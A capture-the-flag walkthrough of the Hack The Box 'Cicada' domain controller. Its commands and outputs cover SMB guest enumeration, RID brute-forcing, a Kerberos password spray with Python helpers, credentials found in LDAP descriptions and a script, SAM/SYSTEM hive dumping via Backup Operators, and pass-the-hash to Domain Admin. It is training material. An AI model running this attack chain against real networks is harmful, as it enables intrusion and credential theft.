Cicada
An Active Directory box on Hack The Box: a single Windows Server 2022 domain controller.

Enumeration:
Port Scanning:
We start with a full TCP port scan with nmap (default scripts plus version detection):
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 10.129.136.252
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-10 20:06 +03
Nmap scan report for 10.129.136.252
Host is up, received echo-reply ttl 127 (0.17s latency).
Scanned at 2025-09-10 20:06:08 +03 for 203s
Not shown: 65522 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-11 00:07:06Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
| SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
| -----BEGIN CERTIFICATE-----
<snipped>
|_-----END CERTIFICATE-----
|_ssl-date: 2025-09-11T00:08:56+00:00; +7h00m01s from scanner time.
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-11T00:08:57+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
| SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
| -----BEGIN CERTIFICATE-----
<snipped>
|_-----END CERTIFICATE-----
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-11T00:08:56+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
| SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
| -----BEGIN CERTIFICATE-----
<snipped>
|_-----END CERTIFICATE-----
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
| SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
| -----BEGIN CERTIFICATE-----
<snipped>
|_-----END CERTIFICATE-----
|_ssl-date: 2025-09-11T00:08:57+00:00; +7h00m02s from scanner time.
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
65364/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
<snipped>
|_clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m01s
<snipped>
So this is an Active Directory domain controller: DNS, Kerberos, LDAP/LDAPS (including the global catalog on 3268/3269), SMB and WinRM (5985) are all exposed, the LDAP certificate names the host CICADA-DC.cicada.htb, and the target's clock is about 7 hours ahead of ours.
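The 7-hour skew nmap reports is worth checking before touching port 88, because the KDC rejects anything more than 5 minutes off its clock. The Python below is an added example, not part of the original writeup: it parses nmap's ssl-date, clock-skew and kerberos-sec server-time lines (the sample is constructed from the scan above), computes the target-minus-scanner offset and reports whether Kerberos will accept our requests. The scanner timestamp used for the cross-check and the `+<seconds>s` offset string (meant for libfaketime) are assumptions.

```python
"""Added example (not from the original writeup): derive the target's clock skew
from nmap output and decide whether Kerberos will accept our requests."""
import re
from datetime import datetime, timezone

# Kerberos rejects authenticators whose timestamp is further than this from the
# KDC's clock (KRB_AP_ERR_SKEW); five minutes is the Windows default.
MAX_KRB_SKEW = 300

# Constructed sample: the skew-related lines from the scan above.
SAMPLE_NMAP = """\
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-11 00:07:06Z)
|_ssl-date: 2025-09-11T00:08:56+00:00; +7h00m01s from scanner time.
|_clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m01s
"""

# nmap durations look like +7h00m01s, -3m or 2d1h; every unit is optional.
_DURATION = re.compile(r'([+-]?)(?:(\d+)d)?(?:(\d+)h)?(?:(\d+)m)?(?:(\d+)s)?$')


def parse_duration(text):
    """'+7h00m01s' -> 25201 seconds, '-3m' -> -180; raises on anything else."""
    m = _DURATION.match(text.strip())
    if not m or not any(m.group(i) for i in range(2, 6)):
        raise ValueError(f'not an nmap duration: {text!r}')
    sign = -1 if m.group(1) == '-' else 1
    days, hours, mins, secs = (int(g or 0) for g in m.groups()[1:])
    return sign * (((days * 24 + hours) * 60 + mins) * 60 + secs)


def skew_from_nmap(output):
    """Target-minus-scanner offset in seconds, from nmap's clock-skew summary
    line if present, otherwise from the first ssl-date line."""
    m = re.search(r'clock-skew: mean: (\S+),', output)
    if not m:
        m = re.search(r'ssl-date: \S+; (\S+) from scanner time', output)
    if not m:
        raise ValueError('no skew information in nmap output')
    return parse_duration(m.group(1))


def skew_from_kerberos(output, scanner_now):
    """Independent cross-check: the KDC's own timestamp from the kerberos-sec
    banner minus the UTC instant at which the scanner probed port 88."""
    m = re.search(r'server time: (\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})Z', output)
    if not m:
        return None
    kdc = datetime.strptime(m.group(1), '%Y-%m-%d %H:%M:%S').replace(tzinfo=timezone.utc)
    return int((kdc - scanner_now).total_seconds())


def kerberos_ready(skew_seconds):
    """True when the skew is within what the KDC will tolerate."""
    return abs(skew_seconds) <= MAX_KRB_SKEW


def faketime_offset(skew_seconds):
    """Relative offset for libfaketime (assumed syntax: '+25201s'), an alternative
    to stepping the system clock, which a local NTP client may undo again."""
    return f'{skew_seconds:+d}s'


def check_target(output, scanner_now):
    """Everything a Kerberos step needs to know about the target's clock."""
    skew = skew_from_nmap(output)
    return {
        'skew': skew,
        'kdc_skew': skew_from_kerberos(output, scanner_now),
        'kerberos_ready': kerberos_ready(skew),
        'faketime': faketime_offset(skew),
    }


def demo():
    # Constructed: the UTC instant at which the scan above hit port 88
    # (20:07:05 in the scanner's +03 zone).
    scanner_now = datetime(2025, 9, 10, 17, 7, 5, tzinfo=timezone.utc)
    return check_target(SAMPLE_NMAP, scanner_now)


if __name__ == '__main__':
    for key, value in demo().items():
        print(f'{key}: {value}')
```

Both sources agree on 25201 seconds here; when they disagree by more than a few seconds, the ssl-date figure is usually the stale one because nmap probes the ports at different moments.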
Let's confirm the domain and hostname of the target domain controller with netexec:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ netexec smb 10.129.136.252
SMB 10.129.136.252 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB signing is required and SMBv1 is off, so NTLM relay to this host's SMB service is off the table. Add the hostname and domain to /etc/hosts:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
<snipped>
10.129.136.252 CICADA-DC.cicada.htb cicada.htb CICADA-DC
Nmap also showed the target's clock is about 7 hours ahead of ours. Kerberos rejects requests whose timestamp is more than 5 minutes off the KDC's clock, so I will sync the time with the target now in case we need Kerberos later (a local NTP client may step the clock back again, so this sometimes has to be repeated):
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ sudo ntpdate 10.129.136.252
2025-09-11 04:19:57.180875 (+0300) +25201.460337 +/- 0.074793 10.129.136.252 s1 no-leap
CLOCK: time stepped by 25201.460337
We can list the available shares with a guest session (empty password):
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ netexec smb cicada-dc.cicada.htb -u 'guest' -p '' --shares
SMB 10.129.136.252 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.136.252 445 CICADA-DC [+] cicada.htb\guest:
SMB 10.129.136.252 445 CICADA-DC [*] Enumerated shares
SMB 10.129.136.252 445 CICADA-DC Share Permissions Remark
SMB 10.129.136.252 445 CICADA-DC ----- ----------- ------
SMB 10.129.136.252 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.136.252 445 CICADA-DC C$ Default share
SMB 10.129.136.252 445 CICADA-DC DEV
SMB 10.129.136.252 445 CICADA-DC HR READ
SMB 10.129.136.252 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.136.252 445 CICADA-DC NETLOGON Logon server share
SMB 10.129.136.252 445 CICADA-DC SYSVOL Logon server share
Guest has read access to the HR share (and to IPC$, which is what makes the RID enumeration later possible). Let's list the files in that share with impacket-smbclient:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Cicada/smb]
└─$ impacket-smbclient cicada.htb/guest@10.129.136.252
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
Type help for list of commands
# shares
ADMIN$
C$
DEV
HR
IPC$
NETLOGON
SYSVOL
# use hr
# ls
drw-rw-rw- 0 Fri Mar 15 09:26:17 2024 .
drw-rw-rw- 0 Thu Mar 14 15:21:29 2024 ..
-rw-rw-rw- 1266 Wed Aug 28 20:31:48 2024 Notice from HR.txt
# get Notice from HR.txt
# exit
There is a single file, a notice from the HR team:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Cicada/smb]
└─$ cat Notice\ from\ HR.txt
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Cor************
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
We now have a default password but no username. The guest session can still resolve RIDs to account names over IPC$, so we enumerate the domain's accounts with netexec's --rid-brute option:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ netexec smb cicada-dc.cicada.htb -u 'guest' -p '' --rid-brute
SMB 10.129.136.252 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.136.252 445 CICADA-DC [+] cicada.htb\guest:
SMB 10.129.136.252 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.129.136.252 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.129.136.252 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB 10.129.136.252 445 CICADA-DC 512: CICADA\Domain Admins (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 513: CICADA\Domain Users (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 514: CICADA\Domain Guests (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 515: CICADA\Domain Computers (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 516: CICADA\Domain Controllers (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 517: CICADA\Cert Publishers (SidTypeAlias)
SMB 10.129.136.252 445 CICADA-DC 518: CICADA\Schema Admins (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 519: CICADA\Enterprise Admins (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 525: CICADA\Protected Users (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 526: CICADA\Key Admins (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.136.252 445 CICADA-DC 571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.136.252 445 CICADA-DC 572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.136.252 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB 10.129.136.252 445 CICADA-DC 1101: CICADA\DnsAdmins (SidTypeAlias)
SMB 10.129.136.252 445 CICADA-DC 1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 1103: CICADA\Groups (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.129.136.252 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.129.136.252 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.129.136.252 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.129.136.252 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)
Save that output to temp.txt and keep only the user accounts (field 6 is DOMAIN\name; the cut strips the domain):
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ cat temp.txt | grep SidTypeUser | awk '{print $6}' | cut -d '\' -f 2 > users.txt
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ cat users.txt
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
I will use kerbrute to spray the default password against every account (one Kerberos pre-authentication attempt per user, so there is no lockout risk at this volume):
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ kerbrute passwordspray users.txt 'Cicada$M6Corpb*@Lp#nZp!8' --dc cicada-dc.cicada.htb -d cicada.htb
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 09/11/25 - Ronnie Flathers @ropnop
2025/09/11 03:25:19 > Using KDC(s):
2025/09/11 03:25:19 > cicada-dc.cicada.htb:88
2025/09/11 03:25:20 > [+] VALID LOGIN: michael.wrightson@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8
2025/09/11 03:25:20 > Done! Tested 9 logins (1 successes) in 1.390 seconds
One account, michael.wrightson, still uses the default password.
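The awk one-liner above is enough for this box, but it breaks on names containing spaces and keeps krbtgt and the machine account in the spray list. As an added example (not the writeup's own tooling), the Python below parses netexec --rid-brute output properly, filters it down to accounts worth spraying, and pulls the valid logins back out of kerbrute's output. Both samples are constructed from the output shown above; the SKIP_SPRAY set is an assumption.

```python
"""Added example (not the writeup's own tooling): build a spray list from
netexec --rid-brute output and extract hits from kerbrute passwordspray output."""
import re

# Constructed sample: a subset of the --rid-brute lines shown above.
RID_BRUTE_OUTPUT = """\
SMB 10.129.136.252 445 CICADA-DC 500: CICADA\\Administrator (SidTypeUser)
SMB 10.129.136.252 445 CICADA-DC 501: CICADA\\Guest (SidTypeUser)
SMB 10.129.136.252 445 CICADA-DC 502: CICADA\\krbtgt (SidTypeUser)
SMB 10.129.136.252 445 CICADA-DC 512: CICADA\\Domain Admins (SidTypeGroup)
SMB 10.129.136.252 445 CICADA-DC 553: CICADA\\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.136.252 445 CICADA-DC 1000: CICADA\\CICADA-DC$ (SidTypeUser)
SMB 10.129.136.252 445 CICADA-DC 1104: CICADA\\john.smoulder (SidTypeUser)
SMB 10.129.136.252 445 CICADA-DC 1106: CICADA\\michael.wrightson (SidTypeUser)
SMB 10.129.136.252 445 CICADA-DC 1601: CICADA\\emily.oscars (SidTypeUser)
"""

# Constructed sample: the result lines kerbrute printed above.
KERBRUTE_OUTPUT = """\
2025/09/11 03:25:19 > Using KDC(s):
2025/09/11 03:25:19 > cicada-dc.cicada.htb:88
2025/09/11 03:25:20 > [+] VALID LOGIN: michael.wrightson@cicada.htb:Cicada$M6Corpb*@Lp#nZp!8
2025/09/11 03:25:20 > Done! Tested 9 logins (1 successes) in 1.390 seconds
"""

# "<rid>: <DOMAIN>\<name> (<SidType>)". Names may contain spaces ("Domain Admins"),
# which is why an awk field split is not enough; match lazily up to the type.
_RID_LINE = re.compile(r'(\d+): ([^\\\s]+)\\(.+?) \((SidType\w+)\)\s*$')

# Assumed: accounts that never yield a usable login from a spray. krbtgt is
# disabled by default and Guest is the session we already have.
SKIP_SPRAY = {'krbtgt', 'guest'}


def parse_rid_brute(output):
    """Yield (rid, domain, name, sidtype) for every line that resolved a RID."""
    for line in output.splitlines():
        m = _RID_LINE.search(line)
        if m:
            rid, domain, name, sidtype = m.groups()
            yield int(rid), domain, name, sidtype


def spray_candidates(output, include_machines=False):
    """User accounts worth spraying, in RID order. Machine accounts (name ends
    in '$') have long random passwords and are skipped unless asked for."""
    names = []
    for _rid, _domain, name, sidtype in parse_rid_brute(output):
        if sidtype != 'SidTypeUser' or name.lower() in SKIP_SPRAY:
            continue
        if name.endswith('$') and not include_machines:
            continue
        names.append(name)
    return names


# "[+] VALID LOGIN: user@domain:password". The domain stops at the first ':',
# so passwords containing ':' or '@' (like the one above) survive intact.
_VALID = re.compile(r'\[\+\] VALID LOGIN:\s+([^@\s]+)@(\S+?):(.*)$')


def valid_logins(output):
    """Return [(user, domain, password), ...] from kerbrute passwordspray output."""
    return [m.groups() for line in output.splitlines()
            for m in [_VALID.search(line)] if m]


if __name__ == '__main__':
    # Equivalent of the users.txt step above, then the spray result.
    print('\n'.join(spray_candidates(RID_BRUTE_OUTPUT)))
    for user, domain, password in valid_logins(KERBRUTE_OUTPUT):
        print(f'[+] {domain}\\{user} : {password}')
```

Redirect the first print to users.txt to feed kerbrute; the parsed hits can go straight into the next netexec or bloodhound-python invocation.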
BloodHound:
Collect the domain data with bloodhound-python:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Cicada/bloodhound]
└─$ sudo bloodhound-python -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -ns 10.129.136.252 -d cicada.htb -dc cicada-dc.cicada.htb -c all
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: cicada.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: cicada-dc.cicada.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: cicada-dc.cicada.htb
INFO: Found 9 users
INFO: Found 54 groups
INFO: Found 3 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: CICADA-DC.cicada.htb
INFO: Done in 00M 50S
Note the KRB_AP_ERR_SKEW warning: the clock had drifted out of Kerberos tolerance again since the ntpdate step, so the collector fell back to NTLM. That is harmless for LDAP collection, but anything Kerberos-only would need the clock re-synced first.
Start BloodHound and upload the collected JSON files to it:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Cicada/bloodhound]
└─$ sudo bloodhound
Starting neo4j
Neo4j is running at pid 20694
Bloodhound will start
IMPORTANT: It will take time, please wait...
opening http://127.0.0.1:8080
<snipped>
Nothing useful turns up for michael.wrightson himself, but BloodHound shows that emily.oscars is a member of Backup Operators. That group holds SeBackupPrivilege, which bypasses file ACLs for read access, so if we compromise her we can export the SAM database and the SYSTEM registry hive:

Lateral Movement to david.orelious:
Next I will pull the description attribute of every user over LDAP; administrators sometimes stash sensitive data such as passwords there:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ netexec ldap cicada-dc.cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -M get-desc-users
LDAP 10.129.136.252 389 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
LDAP 10.129.136.252 389 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
GET-DESC... 10.129.136.252 389 CICADA-DC [+] Found following users:
GET-DESC... 10.129.136.252 389 CICADA-DC User: Administrator description: Built-in account for administering the computer/domain
GET-DESC... 10.129.136.252 389 CICADA-DC User: Guest description: Built-in account for guest access to the computer/domain
GET-DESC... 10.129.136.252 389 CICADA-DC User: krbtgt description: Key Distribution Center Service Account
GET-DESC... 10.129.136.252 389 CICADA-DC User: david.orelious description: Just in case I forget my password is aRt$Lp#7t*VQ!3
That gives us a second set of credentials, david.orelious:aRt$Lp#7t*VQ!3, stored in a description attribute that any authenticated domain user can read.
Privilege Escalation:
Backup Operators:
Let's revisit the shares as david.orelious, since DEV was listed but not readable as guest:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ netexec smb cicada-dc.cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
SMB 10.129.136.252 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.136.252 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.129.136.252 445 CICADA-DC [*] Enumerated shares
SMB 10.129.136.252 445 CICADA-DC Share Permissions Remark
SMB 10.129.136.252 445 CICADA-DC ----- ----------- ------
SMB 10.129.136.252 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.136.252 445 CICADA-DC C$ Default share
SMB 10.129.136.252 445 CICADA-DC DEV READ
SMB 10.129.136.252 445 CICADA-DC HR READ
SMB 10.129.136.252 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.136.252 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.129.136.252 445 CICADA-DC SYSVOL READ Logon server share
As david.orelious we now have read access to DEV. Let's connect to that share and look for anything interesting:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Cicada/smb]
└─$ smbclient //10.129.136.252/dev -U 'david.orelious@cicada.htb%aRt$Lp#7t*VQ!3'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Mar 14 15:31:39 2024
.. D 0 Thu Mar 14 15:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 20:28:22 2024
4168447 blocks of size 4096. 478768 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)
smb: \> exit
The share holds a backup script with a hard-coded plaintext password for emily.oscars:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Cicada/smb]
└─$ cat Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
As BloodHound showed, emily.oscars is a member of Remote Management Users and Backup Operators. The first lets us log in over WinRM; the second grants SeBackupPrivilege, so reg save can export the SAM and SYSTEM hives that a normal user cannot read:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ evil-winrm -i 10.129.136.252 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\sam sam
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\system system
The operation completed successfully.
Then we pull both hives back with evil-winrm's download command:
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download sam
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\sam to sam
Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download system
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\system to system
Info: Download successful!
Offline, impacket-secretsdump decrypts the SAM with the boot key taken from the SYSTEM hive:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ impacket-secretsdump -sam sam -system system local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
The 31d6cfe0... NT hash on Guest and DefaultAccount is the hash of an empty password, so only the Administrator entry is interesting. Test its NT hash against the domain with netexec (pass-the-hash):
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ netexec smb cicada-dc.cicada.htb -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341
SMB 10.129.136.252 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.136.252 445 CICADA-DC [+] cicada.htb\administrator:2b87e7c93a3e8a0ea4a581937016f341 (Pwn3d!)
It works. A domain controller's local SAM holds only the Directory Services Restore Mode administrator, and on this box its NT hash is identical to the domain Administrator's, so passing the hash gives us Domain Admin without ever knowing the password. Domain accounts themselves live in NTDS.dit, which the same backup privilege could also copy out via a volume shadow copy, but the shortcut suffices here.
With that hash we can also log in over WinRM as the domain Administrator:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Cicada]
└─$ evil-winrm -i 10.129.136.252 -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
